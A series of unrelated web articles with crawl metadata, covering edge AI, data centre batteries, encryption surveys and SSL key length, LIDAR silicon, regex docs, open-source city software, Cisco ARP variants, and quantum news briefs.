AI Data Processing at the Edge Reduces Costs, Data Latency A race is on to accelerate artificial intelligence (AI) at the edge of the network and reduce the need to transmit huge amounts of data to the cloud. The edge, or edge computing, brings data processing resources closer to the data and devices that need them, reducing data latency, which is important for many time-sensitive processes, such as video streaming or self-driving cars. Development of specialized silicon and enhanced machine learning (ML) models is expected to drive greater automation and autonomy at the edge for new offerings, from industrial robots to self-driving vehicles. Vast computer resources in centralized clouds and enterprise data centers are adept at processing large volumes of data to spot patterns and create machine learning training models that “teach” devices to infer what actions to take when they detect similar patterns. But when those models detect something out of the ordinary, they are forced to seek intervention from human operators or get revised models from data-crunching systems. That’s not sufficient in cases where decisions must be made instantaneously, such as shutting down a machine that is about to fail. “A self-driving car doesn’t have time to send images to the cloud for processing once it detects an object in the road, nor do medical applications that evaluate critically ill patients have leeway when interpreting brain scans after a hemorrhage,” McKinsey & Co. analysts wrote in a report on AI opportunities for semiconductors. “And that makes the edge, or in-device computing, the best choice for inference.” That’s where AI data processing at the edge is gathering steam. Overcoming Budget and Bandwidth Limits As the number of edge devices increases exponentially, sending high volumes of data to the cloud could quickly overwhelm budgets and broadband capabilities. That issue can be overcome with deep learning (DL), a subset of ML that uses neural networks to mimic the reasoning processes of the human brain. This allows a device to self-learn from unstructured and unlabeled data. With DL-embedded edge devices, organizations can reduce the amount of data that needs to be sent to data centers. Similarly, specialized ML-embedded chips can be taught to discard raw data that doesn’t require output activity — for example, sending video data to the cloud when it meets certain criteria, such as capturing only a human image and discarding images of birds and dogs. “There isn’t enough bandwidth in the world to just collect data and send it to the cloud,” said Richard Wawrzyniak, a senior market analyst with Semico Research Corp. “AI has advanced to the point that data crunching resides in the device and then sends whatever data points are relevant to somewhere to be processed.” Deciding What Is Near and Dear Organizations face the challenge of developing architectures that differentiate between data that can be processed at the edge versus that which should be sent upstream. “We are seeing two dimensions,” explained Sreenivasa Chakravarti, vice president of the manufacturing business group at Tata Consultancy Services (TCS). “Most organizations are trying to segregate the data and talking about how to keep what is nearest to you at the edge and what to park in the cloud.” This requires having a cloud-to-edge data strategy. Chakravarti said he expects autonomous edge capabilities to be used in more production lines, not just in self-driving vehicles. The challenge is in synchronizing autonomous activity in a larger ecosystem, he said, as manufacturers want to increase the throughput of their operations, not just individual systems. Similarly, many autonomous systems must incorporate some type of human interface. “Before the automotive industry is ready to let AI take the wheel, it first wants to put it in currently produced cars with lots of driver-assist technology,” wrote ARC Advisory Group senior analyst Dick Slansky. “AI lends itself very well to powering advanced safety features for connected vehicles. The driver-assist functions embedded into the vehicles coming off production lines today are helping drivers become comfortable with AI before the vehicles become completely autonomous.” The Future of AI Data Processing at the Edge Almost every edge device shipping by 2025, from industrial PCs to mobile phones and drones, will have some type of AI processing, predicted Aditya Kaul, research director with market research firm Omdia|Tractica. “There is a host of other categories where we haven’t seen activity or visibility yet, because original equipment manufacturers haven’t moved that fast across all traditional areas and need to understand the value of AI at the edge. That will be the second wave in 2025 to 2030,” Kaul predicted. Chip manufacturers are engaged in a heated arms race to market AI acceleration modules for edge devices. Established companies such as microprocessor titan Intel and graphic processor leader NVIDIA face challenges from new competitors, such as well-funded tech giants Google, Microsoft and Amazon, and emerging companies such as Blaize and Hailo Technologies. Some 30 companies were engaged in developing AI acceleration chip technology for edge applications at the beginning of the year, likely heading toward cutthroat competition. “I wouldn’t want to be one of those companies,” said Simon Crosby, Chief Technology Officer at Swim, a developer of software for processing streaming data. “In the edge world, ultimately acceleration parts have to be used in a vertically integrated solution by somebody who is going to take a hardware-based solution to market. Customers don’t care about the innards.” Jumping in to AI at the Edge Technology for AI applications at the edge is advancing so quickly that many organizations may be hesitant to invest in a particular technology for fear that it will quickly be leapfrogged by more advanced capabilities. TCS’s Chakravarti said he advises companies not to wait until they think technology has matured but instead to start building organizational competency. “You either wait for maturity to come and be left behind or make early investments and grow along with the technology,” Chakravarti said. However, he advised, “don’t take technology and hunt for problems. Focus on your problems and hunt for the technology to solve them.”
<urn:uuid:b4384049-4833-436c-9236-ceadb58f7153>
CC-MAIN-2022-40
https://www.iotworldtoday.com/2020/11/18/ai-data-processing-at-the-edge-reduces-costs-data-latency/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335034.61/warc/CC-MAIN-20220927131111-20220927161111-00733.warc.gz
en
0.939246
1,321
3.03125
3
BATTERY MONITORING AND ENERGY MANAGEMENT Data Center industry is booming as a result of dramatic increase in cloud computing bringing new challenges and opportunities. Data centers are important energy consumes, but as in many other cases, importance of quality prevails on quantity. To achieve a high tier classification, Data centers need redundant power supply and reliable backup power source which normally include UPS. UPS use batteries and numbers are impressive: a data center my easily need well over 10.000 batteries. How to monitor, manage and maintain batteries? How can we predict failure and how can we increase battery life and reduce cost? Shall we use traditional or Li-Ion based batteries? Why monitoring systems should be a part of EMS (energy monitoring system) and how can Artificial intelligence, demand modelling and green power sources help to reduce operating cost and improve reliability.
<urn:uuid:a8330728-4df3-44cd-a37d-a743df5f0784>
CC-MAIN-2022-40
https://www.datacentreworldasia.com/2022-conference-programme/session-presented-by-robotina
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335444.58/warc/CC-MAIN-20220930051717-20220930081717-00733.warc.gz
en
0.914239
173
2.703125
3
Many of us take planes, trains and automobiles. We don’t have to be hydraulic specialists, railroad engineers or car mechanics to use these modes of transportation. But it doesn’t hurt to know how to navigate an airport and read a train schedule or understand the rules of the road. Of course, today our journeys aren’t always in the physical world. When we want to go somewhere or do something, we often do it online. Understanding how to navigate and stay safe in the virtual world is critical. In the physical world, we protect ourselves with safety methods, for example, by buckling our seatbelts and standardizing airbags. In the digital world, we need to safeguard our data, devices and privacy from vulnerabilities. You don’t need me to tell you the importance of cybersecurity. Data breaches, ransomware and other online security events are in the news almost daily. That is why encryption is one of the strongest and most effective way to protect critical data. But encryption is a fairly new concept to many individuals and organizations. We wanted to understand just how much Americans understand about encryption. So, we fielded a survey of 1,000 U.S. adults to find out. Here’s a snapshot of what we discovered. Most Americans correctly identified the definition of encryption More than 72% of the survey group was able to select the right definition of encryption. The right definition is that encryption “means making data unreadable to anyone other than those holding the encryption key.” However, the rest of the group either selected one of the two wrong answers. Or they said they had no idea what the correct answer was. Even more said that encryption – in general and related to cloud – is important Additionally, more than 87% of the survey group said that encryption is important. And more than half said they understand that their private data is safe in the cloud if it is encrypted. That is encouraging, especially given the expanding threat landscape. As more applications and endpoints go online, cybersecurity becomes an even greater challenge. Just look at where things are going. Gartner expects the public cloud services market to grow to $266.4 billion by the end of this year. Forrester thinks the public cloud market will grow to $411 billion by 2022, and 451 Research says nearly 14 billion IoT devices could be online by 2024. But many appeared uncertain about who can and should encrypt what and how it works Only a little more than half the survey group (53.3%) understand that individual consumers can encrypt their own personal data. Nearly a third (32%) said they didn’t know if consumers can do so. And 14.7% incorrectly answered that individuals cannot encrypt their own personal data. That suggests that businesses and government must work to educate consumers about encryption. The upside is that some already are doing that. For example, Entrust , an Entrust Datacard company, has sponsored this survey, and we regularly write and speak about encryption. In addition, the U.S. Federal Trade Commission advises members of the public to use encryption to keep their personal information secure. When asked why people and companies encrypt data, however, fewer than half of our survey group answered correctly. Slightly more than 47% rightly said that individuals and organizations use encryption to keep data secure until it’s unencrypted. Even fewer were able to correctly identify cryptographic keys when provided with a series of answers. Just 45.9% correctly identified cryptographic keys as a series of codes needed to unlock encryption. Nonetheless, most understand the case for using encryption to protect their finances More than half of the survey group indicated that they understand that encryption can be used to secure online banking (55.7%) and financial information (52.6%). Forty-six percent said it can be used to secure mobile payments. And more than 42% said it can safeguard mobile wallets. That is encouraging, since financial gain is the most common driver of data breaches. The 2019 Verizon Data Breach Investigations Report said 71% of breaches are financially motivated. That explains why financial institutions encourage their customers to use encryption. This Bank of America FAQ page is one example of that. It talks about how encryption works to secure online banking, financial information and mobile payments. Consumers apparently want their financial services companies to use encryption, too. More than half (54.9%) of the survey group said they place the highest trust in the financial services sector to encrypt their data. The health care industry (38.7%), technology (36.1%) vertical and public sector (30%) ranked next on the “most trusted to encrypt your data” list. Still, plenty of confusion exists, and many people would like more certainty However, there appears to be a fair share of confusion as to which applications encryption can secure. There are lots of them, including blockchain, cloud, digital payments, and IoT. Nearly 40% of Americans misunderstand what encryption is. Survey results suggest this group either thinks encryption means you have to enter a password before you can unlock data or that it occurs when you’ve installed an antivirus system on your computer. Yet, as more breaches occur and more connected endpoints join the fray, more people are becoming aware of the need to use encryption to secure their data and devices. And they’re wanting more certainty related to encryption and cybersecurity. A proof point of the need for greater certainty is the fact that 74.3% of survey participants said they would feel very or somewhat safe that their private information was secure if they knew it was given a formal seal of encryption, while 47.9% said they would trust a company that used a formal seal of encryption. Such certification could be in our collective future. And proven encryption solutions exist today. People and organizations wanting to protect their enterprise infrastructure, network communications and sensitive data against threats should get onboard with encryption today.
<urn:uuid:0eb345ef-f479-4754-88fc-5a885c5a4d90>
CC-MAIN-2022-40
https://www.entrust.com/it/blog/2020/01/creating-broader-understanding-and-more-widespread-adoption-of-encryption-is-a-journey/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336674.94/warc/CC-MAIN-20221001132802-20221001162802-00733.warc.gz
en
0.954975
1,217
2.78125
3
Rate this article: (14 votes, average: 4.64) There are two possible reasons why you’re reading this post right now. The first is that you’re exploring SSL certificate options, and you stumbled across the term “128 bit SSL encryption.” The second possible case could be that you came across this term on an ecommerce site or somewhere else, and your sheer curiosity led you here. In either case, you’ll have a good enough idea about 128 bit SSL encryption. An SSL certificate protects your privacy by encrypting the data between a client (usually a web browser) and a web server. Thus, it prevents an ill-intended third party from stealing and tampering with the data in transit. Such security is necessary to protect users’ sensitive data such as credit card information, passwords, personal messages, etc. But how does it work? Let’s break down this process into two basic steps: When you visit a website through your web browser, it checks to see whether there’s an SSL certificate installed. If found, both the parties begin the communication process known as the SSL/TLS handshake. Once contact is established, the web browser validates the authenticity of the SSL/TLS certificate installed on the web server. This communication between client and server is done through a cryptographic technique called asymmetric encryption, or what’s also known as public key encryption. This encryption method involves two keys for the encryption and decryption of the data. Public and private keys are different, yet they’re mathematically related to each other. The public key, as the name suggests, is public and is used by the client to encrypt the information. The private key, on the other hand, is kept by the server and is used to decrypt data. Asymmetric encryption, through the use of the two keys, provides a unique way to validate the identities of both parties. Although this method is a more secure way of protecting the information, it takes significantly more time to encrypt and decrypt the data than another encryption method we’ll talk about momentarily. This would ultimately result in slower communication irrespective of internet speed. In other words, it’s not practical to use asymmetric encryption for each bit of information. But the problem is that we need it for validation of both the parties. So, what’s the answer to this issue? The solution comes in the form of a session key — a generated third key that’s used for the remainder of the secure connection. This unique key is formed by both parties (server & client) and used for encryption for the rest of the session. This is called symmetric encryption. The length key is usually of 128 or 256 bits, something we know you’re curious about since you’re still here and reading this article. 128 bit refers to the length of the symmetric encryption key (session key) that are used for encryption purpose. The higher the key length, the harder it’s for a hacker to crack it as there’s only one way to break this key — through trial and error (a brute-force attack, if you want to be technical). So, if an SSL certificate has a symmetric key of 128 bit length, it’ll have 2128 possible combinations — which is a HUGE number! To crack this key, one must try most of these combinations. Here are a few estimates for how long it would take to crack keys of various lengths: |Key Size||Time to Crack| |128-bit||1.02 x 1018 years| |192-bit||1.872 x 1037 years| |256-bit||3.31 x 1056 years| Yes, with the computational capabilities of existing technologies, it’s impossible to crack the 128 bit key into a measurable timeframe. Even the fastest supercomputers in the world can’t do anything about it. So, your data is in safe hands. As you can see in the above table, it’s harder to crack keys of higher lengths. However, don’t automatically assume that because you’re using 128-bit key that it means your encryption strength is 128 bits. That’s because, right now, you could be using 40-bit encryption with 128-bit SSL. Yes, that’s certainly possible if you haven’t configured your web server for 128-bit SSL encryption. The capabilities of your server and browser play a major role in determining the encryption strength. So, to implement 128-bit SSL encryption, you must first configure your web server accordingly. Otherwise, you won’t achieve the full encryption strength your certificate is capable of. The higher the key length, the harder it is to crack — this is the general rule of thumb that you need to remember. These days, most of the certificate authorities that issue SSL certificates have migrated from 128-bit to 256-bit as a standard for better security. However, cracking either of them is an impossible task until quantum computers come knocking. Until then, it’s all good.TYPES OF SSL CERTIFICATES Get Comodo SSL certificates starting for as little as $7.27 per year!
<urn:uuid:b2694512-b4d4-4f2f-b9b7-2aaa974afb39>
CC-MAIN-2022-40
https://comodosslstore.com/resources/128-bit-ssl-encryption-what-you-need-to-know/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337360.41/warc/CC-MAIN-20221002212623-20221003002623-00733.warc.gz
en
0.920674
1,113
3.53125
4
When a team of engineers went to work in 2015 looking for a new technique to boost the cost-effectiveness of solar cells, they didn’t realize they’d end with a bonus – a way to help improve the collision avoidance systems of self-driving cars. The twin discoveries started, they say, when they began looking for a solution to a well-known problem in the world of solar cells. Solar cells capture photons from sunlight in order to convert them into electricity. The thicker the layer of siliconin the cell, the more light it can absorb, and the more electricity it can ultimately produce. But the sheer expense of silicon has become a barrier to solar cost-effectiveness. So the Stanford engineers figured out how to create a very thin layer of silicon that could absorb as many photons as a much thicker layer of the costly material. Specifically, rather than laying the silicon flat, they nanotextured the surface of the silicon in a way that created more opportunities for light particles to be absorbed. Their technique increased photon absorption rates for the nanotextured solar cells compared to traditional thin silicon cells, making more cost-effective use of the material. Then came the surprise. After the researchers shared these efficiency figures, engineers working on autonomous vehicles began asking whether this texturing technique could help them get more accurate results from a collision-avoidance technology called LIDAR, which is conceptually like sonar except that it uses light rather than sound waves to detect objects in the car’s travel path. LIDAR works by sending out laser pulses and calculating the time it takes for the photons to bounce back. The autonomous car engineers understood that current photon detectors use thick layers of silicon to make sure they capture enough photons to accurately map the terrain ahead. They wondered if texturing a thin layer of silicon, much like on the solar cells, would lead to more accurate maps than the current thin silicon. Indeed, in their new paper, the Stanford engineers report that their textured silicon can capture as many as three to six times more of the returning photons than today’s LIDAR receivers. They believe this will enable self-driving car engineers to design high-performance, next-generation LIDAR systems that would continuously send out a single laser pulse in all directions. The reflected photons would be captured by an array of textured silicon detectors, creating moment-to-moment maps of pedestrian-filled city crosswalks. Harris said the texturing technology could also help to solve two other LIDAR snags unique to self-driving cars – potential distortions caused by heat and the machine equivalent of peripheral vision. The heat problem occurs because the LIDAR laser apparatus can heat up during extended use, causing photon wavelengths to shift slightly. Such shifts could cause light particles to bounce off traditional silicon that is made to absorb specific wavelengths. But the Stanford nanotexturing technology can absorb photons across a broad spectrum, eliminating this heat-shift issue. With respect to the machine equivalent of peripheral vision, Harris and Zang believe it may be possible to make a flexible version of their nanotextured silicon receptor. Flexibility would allow them to curve the receptor. Between that and the light-trapping advantage of their nanotextured surface, they think it may be possible for LIDAR systems to enlarge the angle of acceptance for photons, in order to more completely identify all potential obstacles. Harris said he always thought Zang’s texturing technique was a good way to improve solar cells. “But the huge ramp up in autonomous vehicles and LIDAR suddenly made this 100 times more important,” he says.
<urn:uuid:f5ae935d-4455-4310-aff2-6b68631a41ce>
CC-MAIN-2022-40
https://debuglies.com/2017/10/05/new-way-to-improve-solar-cells-can-improve-collision-avoidance-systems-of-autonomous-cars/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337360.41/warc/CC-MAIN-20221002212623-20221003002623-00733.warc.gz
en
0.943891
751
4.3125
4
Regular expressions can be used to filter or replace strings with certain patterns. Exasol supports the Perl Compatible Regular Expressions (PCRE) dialect, which has a powerful syntax and exceeds the functionality of dialects like POSIX Basic Regular Expressions (POSIX BRE) or POSIX Extended Regular Expressions (POSIX ERE). This chapter describes the basic functionality of regular expressions in Exasol. Detailed information about the PCRE dialect can be found on www.pcre.org. Regular expressions can be used in the following functions and predicates:
<urn:uuid:f7c8e0a9-09c3-4686-94b3-4dc956ddbeb9>
CC-MAIN-2022-40
https://docs.exasol.com/saas/microcontent/Resources/MicroContent/BasicLanguageElements/regular-expressions.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337631.84/warc/CC-MAIN-20221005140739-20221005170739-00733.warc.gz
en
0.815414
115
2.9375
3
Our world is changing. Transformations to mobility patterns, pressing air quality issues, and growing flood risks present new challenges for European cities. Now, however, thanks to digitization and data, cities can tackle these challenges together. Rather than reinventing the wheel or going down the traditional software vendor route with all its associated issues, cities can improve local services by co-developing and replicating digital solutions based on open-source software. Improving Public Service Delivery with Data-Driven Solutions When the Covid-19 pandemic ripped through Europe last spring, governments had to act fast. With populations confined to their homes, digital solutions were the obvious way forward. But as hospitals started filling up, there was little time for lengthy procurement processes or expensive software development. For Belgium, battling one of the worst Covid-19 rates in Europe, the answer lay in open-source software. By basing its Covid-19 tracing app Coronalert on Germany’s open-source Corona Warn App, Belgium could develop its own app in just six weeks for under €1 million, a fraction of the €20 million Germany originally spent. Instead of starting from scratch, the development team reused 85% of the German code, adapting the rest to Belgium’s unique needs. In addition to reduced costs and rapid development, by selecting open-source Belgium could also prioritize data transparency. The pandemic has been paralleled by a similarly unstoppable spread of misinformation and distrust. For some citizens, relinquishing deeply personal health and location data to a private vendor would be a step too far. By staying in control of the code, Belgium remained in control of citizen data. The app was based on the open-source DP-3T protocol, which doesn’t share personal data, and Belgium chose to ensure the absolute minimum of personal information was collected. In an area this sensitive, transparency and trust can be the difference between an effective tracing system and a public health disaster. Take Back Control with Open-Source Software Solutions While the pandemic has created a clear case for selecting fast, low cost and collaborative solutions, open-source software isn’t solely useful during times of crisis. Open source refers to something people can modify and share because its design is publicly accessible – so open-source software has code anyone can inspect, modify, enhance and share. Most people will have encountered the open-source movement at some point in their personal lives – think VLC, Open Word, or even Mozilla Firefox. But the benefits extend to public service delivery too. Increasingly, it is software that runs society. From traffic management to accounting systems, flood monitoring to maintenance services, in the modern smart city software could even be considered public infrastructure. However, the code that keeps the city moving is frequently hidden in proprietary systems without democratic accountability. By selecting proprietary software solutions from vendors, cities run a risk, becoming dependent on the vendor for vital services. Not only do they lock themselves into a system that produces data for private ownership rather than the public good, but the commercial nature of software vendors also leaves cities vulnerable to changes to future terms, licensing policies, pricing, or even the eventual dissolution of the company. A small but growing number of public authorities are beginning to look to open-source software for a more efficient, democratic, and secure way to run smart, data-driven public services. By selecting open-source cities can diffuse risk and stay in control of the software they use. Open-source software is transparent and provides insight to serve the public interest. It offers cities independence, flexibility, and financial savings. Vendors can be slow to upgrade and inflexible, whereas cities that know their own code can adapt it to changing needs. And, fundamentally, by opening up software development to new networks and increasing the number of people testing and working on the code, cities can co-develop solutions that wouldn’t be possible individually. For both cities sharing their open-source code and cities replicating existing open source solutions, the result is more innovative public services that meet a broader range of needs. Digital mapping developments illustrate how open-source software can accelerate better public service delivery. Geo-data fuels the modern smart city – how could intelligent traffic control, or efficient waste collection, be implemented without digital geographic information? The Agency of Geoinformation and Surveying in Hamburg developed the modular, open-source Masterportal software solution to facilitate geospatial information applications. It’s since been replicated in many German cities for diverse public service uses such as waste management and disaster protection. In Munich, for example, the location and status of mobile recycling stations are updated daily, and the fire service uses geo-data to identify affected streets, plot an unobstructed evacuation route, and locate the nearest hospital. Geo-data can help tackle the issues facing every modern city – and, as Hamburg built its open-source software with replicability in mind, any city can have a Masterportal at little cost. During a workshop, Bradford and Ghent even created their own test Masterportals, featuring some of the services unique to their communities, in a mere two hours. Building a proof of concept in such a short time opens up the possibilities for cities looking to explore innovative ways to deal with their shared challenges. Unfortunately, neither Bradford nor Ghent found practical use-cases for their Mastersportals – illustrating the importance of laying the groundwork to ensure success with this relatively new way of approaching public services. The Path to Successful Replication In theory, building open-source software makes it possible to share digital public service solutions with other cities or departments, saving time and resources. However, the reality is that successful software replication requires preparation. As a new and innovative approach to public service delivery, adopting open source software requires overcoming several barriers. Foremost among these is resistance to change – as open-source often requires cities to adopt new approaches, from redesigning their digital architecture to rethinking organizational processes. Often, business as usual is too easy and navigating the political risk, regulatory bottlenecks, and vested interests in the status quo can prove challenging. For success, it’s also essential to select the right solution – or the right components of a solution. This means finding financing models, assessing political support, and engaging stakeholders, including users, to ensure sufficient interest and build confidence. To pave the way for success when co-developing and replicating software, cities should create a replication plan. This entails mapping what lies ahead, staying on top of legal and technical requirements, and setting up plenty of opportunities for collaboration. For cities building replicable software, it helps to have a replication mindset right from the start. Open-source solutions that are clearly documented and thoroughly explained are much easier to replicate, whether that means implementing an exact copy of the solution under new conditions or (as is more often the case) replicating certain components in a new context. The code needs to be high quality and the repository accessible to foster applicability, and it must have the right kind of open-source license. Other cities also need to find the solution – either online or through their networks – and for international audiences, it helps to have thorough English documentation and demonstrations. If cities take these steps, they can reap the rewards of collaborative development. If others replicate your solution, they will also rely on it, scrutinizing it, fixing bugs, and pointing out limitations. Over time, a community of developers working together will result in stronger code and better solutions for 21st-century challenges. Take mobility, for example. Many of Europe’s cities aim to be carbon neutral in a few decades – which means moving to a low carbon transport system. To make the change, cities need to juggle many moving parts – from urban planning to implementing different transport services and assessing shifting demand. This is where data-driven solutions come in. The City of Bergen built the replicable Mobility Dashboard to collate available but disparate near real-time data on mobility in one user-friendly place. This means Bergen’s traffic data is now available to urban planners, helping them choose the best place for bike infrastructure, optimize mobility services, and locate charging points for electric vehicles. However, when the Mobility Dashboard was sized up as a potential solution for another city, limitations were found surrounding the amount and type of data used. Having more eyes on the code allowed Bergen to improve what they have, correct mistakes, and ensure their service meets a broader range of needs. To access these benefits, the developer – in this case, Bergen – needs to facilitate co-development and replication by sharing the original solution with all necessary information. If you’re a city looking to co-develop or re-use, what’s available? Beyond the technical requirements, it’s important to know the right questions to ask. The unique nature of urban ecosystems means a public service software solution will rarely be perfect off the shelf. Instead, it’s crucial to get to the root of the city’s requirements, engage stakeholders, and tap into networks to determine which generic components of tried and tested solutions could be reused in a new context. Preparing a City for Software Replication There are a number of factors that enable successful, simple software replication: - Pinpoint the Need: Successful digital public service delivery should be based on a real need, with a viable Applications and, ideally, policy backing. - Engage your Stakeholders: Making sure city departments, local agencies, the private sector, and end-users are onboard are crucial – and a great way to do this is by building a strong business case together. - Unique Problems Don’t Need Unique Solutions: Data can be the starting point for replicating public service solutions. While each city has different needs, every city collects data, and once the right, interoperable data source has been found, you can easily align the tech to make use of it. - Ask the Right Questions: When a potential solution has been found, there are many important questions to ask to assess which components are useful to reuse and prepare a replication strategy. - Plugin and Play: Replication means figuring out how to best re-use existing data sources in the software available without overhauling an entire city’s IT system. - Be Ready to Adapt: A few technical changes will probably be necessary to ready software for its new context, but the replication process also offers new perspectives that could help you reconsider existing practices and which could even trigger innovation. Read a detailed breakdown of the steps to successful replication in the SCORE Replication Guide. By replicating existing open-source software solutions for public service delivery, cities can stay in control of their data while accessing wider expertise and networks in the co-development process. The bottom line is better public service delivery at a lower cost.
<urn:uuid:53be9d64-057f-4768-af5f-c2ad965c00d7>
CC-MAIN-2022-40
https://www.iotforall.com/replicable-open-source-solutions-for-public-service-delivery
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337889.44/warc/CC-MAIN-20221006222634-20221007012634-00733.warc.gz
en
0.935388
2,241
2.5625
3
In preparation of our CCNA exam, we want to make sure we cover the various concepts that we could see on our Cisco CCNA exam. So to assist you, below we will discuss ARP, IARP, RARP & Proxy ARP. ARP, IARP, RARP, and Proxy ARP? When I first started studying for my CCNA years ago, one of the things that confused me was ARP. Or rather, what ARP did as opposed to Reverse ARP, Inverse ARP, and Proxy ARP! One book would mention ARP without mentioning the other variations, one would mention RARP but not Proxy ARP, and so on. I never forgot how confusing this was to me when I started. To help current CCNA candidates with this confusing topic, let’s take a look at each one of these technologies. ARP – Address Resolution Protocol You may well know what ARP does from your networking studies or work on a LAN, but to effectively troubleshoot ARP issues on a WAN, you need to take network devices into account that may be separating the workstations in question. The basic ARP operation is simple enough. We concentrate on IP addressing a great deal in our studies and our jobs, but it’s not enough to have a destination IP address in order to send data; the transmitting device must have a destination MAC address as well. If the sender doesn’t know the MAC address of the destination, it has to get that address before data can be sent. To obtain the unknown Layer Two address when the Layer Three address is known, the sender transmits an ARP Request. This is a Layer Two broadcast, which has a destination address of ff-ff-ff-ff-ff-ff. Since Ethernet is a broadcast media, every other device on the segment will see it. However, the only device that will answer it is the device with the matching Layer Three address. That device will send an ARP Reply, unicast back to the device that sent the original ARP Request. The sender will then have a MAC address to go with the IP address and can then transmit. There are several network devices that may be between our two hosts, and for the most part, there is no impact on ARP. Since this is Cisco, though, there’s gotta be an exception! Let’s take a look at how these devices impact ARP. Repeaters and Hubs are Layer One (Physical Layer) devices, and they have no impact on ARP. A repeater’s job is simply to regenerate a signal to make it stronger, and a hub is simply a multiport repeater. Therefore, neither a repeater nor a hub have impact on ARP. Switches are Layer Two devices, so you might think they impact ARP’s operation; after all, ARP deals with getting an unknown MAC address to correspond with a known IP address. While that’s certainly true, switches don’t impact ARP for one simple reason: Switches forward broadcasts out every port except the one it was originally received on. The ARP Reply will be unicast to the device requesting it, as with the previous example. Now here’s the exception — a router. Routers accept broadcasts, but routers will not forward them. For example, consider a PC with the address 220.127.116.11 /16. That host assumes it’s on the same physical segment as the device 18.104.22.168 /16, since their IP addresses are both on the same subnet (22.214.171.124 /16). The problem here is that a router separates the two devices, and the router will not forward the ARP broadcast. The Cisco router will answer the ARP Request, however, with the MAC address of the router interface the ARP Request was received on. In this case, the router will respond to the ARP Request with its own E1 interface’s MAC address. When the device at 126.96.36.199 receives this ARP Response, it thinks the MAC address of 188.8.131.52 is 11-11-11-11-11-11. Therefore, the destination IP for traffic destined for the remote host will be 184.108.40.206, but the MAC destination will actually be that of the router’s E1 interface. Proxy ARP runs by default on Cisco 2500, 1841, 2811 and 1941 routers, but it can be turned off at the interface level with the no ip proxy-arp command. RARP and Inverse ARP Reverse ARP is a lot simpler! RARP obtains a device’s IP address when it already knows its own MAC address. (If the device doesn’t know it’s own MAC address, you have bigger problems than RARP!) A separate device, a RARP Server, tells the device what its MAC address is in response to the RARP Request. As you can see, RARP and DHCP have a lot in common. Inverse ARP doesn’t deal with MAC or IP addresses. Inverse ARP dynamically maps local DLCIs to remote IP addresses when you configure Frame Relay. Many organizations prefer to statically create these mappings; you can turn this default behavior off with the interface-level command no frame inverse-arp. We hope you found this Cisco certification article helpful. We pride ourselves on not only providing top notch Cisco CCNA exam information, but also providing you with the real world Cisco CCNA skills to advance in your networking career.
<urn:uuid:f98cd9e6-c465-4f64-ba1d-83aa92b36c4e>
CC-MAIN-2022-40
https://www.certificationkits.com/arp-iarp-rarp/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334514.38/warc/CC-MAIN-20220925035541-20220925065541-00133.warc.gz
en
0.934084
1,177
3.609375
4
Quantum News Briefs September 9: Crushed plastic bottles could create nanodiamonds for quantum sensors; New device-independent quantum cryptography method could provide more secure cncryption; Commonwealth of Massachusetts awards $3.5M R&D grant for new Northeastern University quantum facility & MORE Quantum News Briefs September 9 begin with explanation how crushed plastic bottles could create nanodiamonds for quantum sensors followed by new device-independent quantum cryptography method could provide more secure cncryption. Commonwealth of Massachusetts awards $3.5M R&D grant for new Northeastern University quantum facility is third & MORE Crushed plastic bottles could create nanodiamonds for quantum sensors A research team has used laser flashes to simulate the interior of ice planets, spurring a new process for producing the type of miniscule diamonds that are essential for quantum sensors.The research and its implications were reported in Engineering&Tehnology (E&T) and summarized here. The international team, headed by the Helmholtz-Zentrum Dresden-Rossendorf (HZDR), the University of Rostock and France’s École Polytechnique, conducted a novel experiment to determine what goes on inside ice planets such as Neptune and Uranus. The researchers fired a laser at a thin film of simple PET plastic and investigated what happened using intensive laser flashes. One result was that the researchers were able to confirm that it really does ‘rain diamonds’ inside the ice giants at the periphery of our solar system. This method could establish a new way of producing nanodiamonds, which are needed, for example, for highly-sensitive quantum sensors. The group has presented its findings in the journal Science Advances. The conditions in the interior of icy giant planets such as Neptune and Uranus are extreme: temperatures reach several thousand degrees Celsius and the pressure is millions of times greater than in the Earth’s atmosphere. Nonetheless, states like this can be simulated briefly in the lab: powerful laser flashes hit a film-like material sample, heat it up to 6,000°C for the blink of an eye and generate a shock wave that compresses the material for a few nanoseconds to a million times the atmospheric pressure. ice giants not only contain carbon and hydrogen but also vast amounts of oxygen. When searching for suitable film material, the group hit on an everyday substance: PET, the resin out of which ordinary plastic bottles are made. “PET has a good balance between carbon, hydrogen and oxygen to simulate the activity in ice planets,” Kraus said. The experiment also opens up perspectives for a technical application: the tailored production of nanometre-sized diamonds, which are already included in abrasives and polishing agents. In the future, it is predicted that they will be used as highly sensitive quantum sensors. New device-independent quantum cryptography method could provide more secure cncryption Researchers at the National University of Singapore (NUS) have developed a new protocol for device-independent QKD or DIQKD. Quantum News Briefs summarizes the NewsDeal coverage below. In the case of device-independent QKD or DIQKD, the cryptographic protocol is not dependent on the device used. For the exchange of quantum mechanical keys, either light signals are sent to the receiver by the transmitter or entangled quantum systems are used.two measurement settings for key generation are used rather than just one. “By introducing the additional setting for key generation, it becomes more difficult to intercept information, and therefore the protocol can tolerate more noise and generate secret keys even for lower-quality entangled states,” said Charles Lim from NUS. Lim is also one of the authors of the study. In conventional QKD methods, security can be guaranteed when the quantum devices used have been characterised well. “And so, users of such protocols have to rely on the specifications furnished by the QKD providers and trust that the device will not switch into another operating mode during the key distribution,” explained Tim van Leent, one of the lead authors. Researchers hope that their method will now help generate secret keys with uncharacterised and untrustworthy devices. They are now aiming to expand the system and incorporate several entangled atom pairs. Commonwealth of Massachusetts awards $3.5M R&D grant for new Northeastern University quantum facility The Baker-Polito Administration in Massachusetts has announced a new $3.5 million grant for the Experiential Quantum Advancement Laboratories (EQUAL), a nearly $10 million project to advance the emerging quantum sensing and related technology sectors in the state. Quantum News Briefs shares key points of the announcement below. The Northeastern-led project will establish new partnerships and leverage several ongoing ones with academic institutions and industry partners. The aim is to develop next-generation quantum technologies, boost training in quantum information science and engineering for students and workers, and establish greater partnerships among industry and government around quantum sensing and related technologies. The new award, from the 